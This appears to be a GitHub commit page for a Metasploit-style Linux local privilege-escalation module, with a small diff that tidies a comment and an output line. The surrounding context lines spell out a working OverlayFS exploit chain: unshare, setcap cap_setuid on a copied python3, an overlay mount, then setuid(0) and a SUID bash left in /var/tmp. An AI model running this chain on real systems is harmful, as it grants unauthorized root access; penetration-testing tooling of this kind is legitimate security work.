Skip to content

Commit c927f22

Browse files
gardnerappjheysel-r7
authored andcommitted
Update modules/exploits/linux/local/game_overlay_privesc.rb
Co-authored-by: jheysel-r7 <[email protected]>
1 parent 5edec25 commit c927f22

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

modules/exploits/linux/local/gameoverlay_privesc.rb

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -140,7 +140,6 @@ def execute_command(_cmd, _opts = {})
140140
# "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
141141

142142
# TODO move running of payload and exploit to different cmd_exec calls
143-
# Swap vulns w code names, make sure regexes work agsain,s
144143
hack = <<-TEXT
145144
unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir};
146145
setcap cap_setuid+eip #{pay_dir}l/python3;
@@ -151,7 +150,7 @@ def execute_command(_cmd, _opts = {})
151150
TEXT
152151

153152
print_status "Running exploit:\n '#{hack}'\n "
154-
print_status "Output of command: #{cmd_exec_with_result(hack)}"
153+
print_status(cmd_exec_with_result(hack))
155154
end
156155

157156
def exploit

0 commit comments

Comments
 (0)